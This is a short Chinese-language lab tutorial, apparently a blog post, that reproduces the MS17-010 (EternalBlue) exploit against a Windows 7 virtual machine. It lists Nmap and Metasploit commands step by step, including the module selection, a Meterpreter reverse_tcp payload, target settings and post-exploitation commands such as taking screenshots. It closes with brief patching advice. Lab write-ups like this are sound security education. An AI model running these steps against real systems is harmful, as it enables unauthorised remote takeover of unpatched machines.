Metasploitable渗透测试实战:ms17-010漏洞复现

384 阅读2分钟

实战准备

  • 软件:Vmware Workstation 17
  • 攻击机:Kali
  • 靶机环境:Win7
  • 工具:Nmap扫描工具(NetWork Mapper)、Metasploit 渗透框架

实战开始

使用sudo su命令进入kali的root下 image.png

使用命令 nmap -A -T4 -sV 192.168.72.* 来全面扫描在192.168.72.*网段下的所有网络,找到win7系统ip地址为192.168.72.131,查看445端口是否在开启状态 image.png

确定ip后开始使用msfconsole命令准备开始渗透 image.png

使用 命令 search ms17-010 搜索名为ms17-010的漏洞,0,1,4为利用攻击模块。2,3为辅助模块 image.png

先使用命令 use 3 来使用3模块确定漏洞是否存在,然后查看信息:show options image.png

Required中为yes选项是一定要填写的而且是缺少目标主机未设置,我们需要给他添加目标主机,使用命令set rhost 192.168.72.131 并查看 show options image.png

使用 命令:run 扫描目标机器是否存在ms17-010,发现主机易受ms17-010攻击! image.png

ok,开始配置,切换到攻击模块:use 0,发现没有配置有效负载,我们来配置下:set payload windows/x64/meterpreter/reverse_tcp

image.png

查看信息:show options,确定攻击机和目标机ip是否一致,发现缺少目标机器的IP,添加目标机器IP地址:192.168.72.131,命令:set rhosts 192.168.72.131,并再次查看信息:show options。 image.png

image.png

10攻击:run image.png

11使用meterpreter的一系列命令可以开始渗透操作。例如:show_mount列出目标机所有驱动,screenshot截取目标机当前屏幕。 image.png

image.png kali image.png 目标机win7 image.png

MS17-010漏洞防范

  • 更新系统
  • 打开防火墙
  • 安装杀毒软件

声明

内容只代表作者本人观点,本文仅作为网络安全学习参考。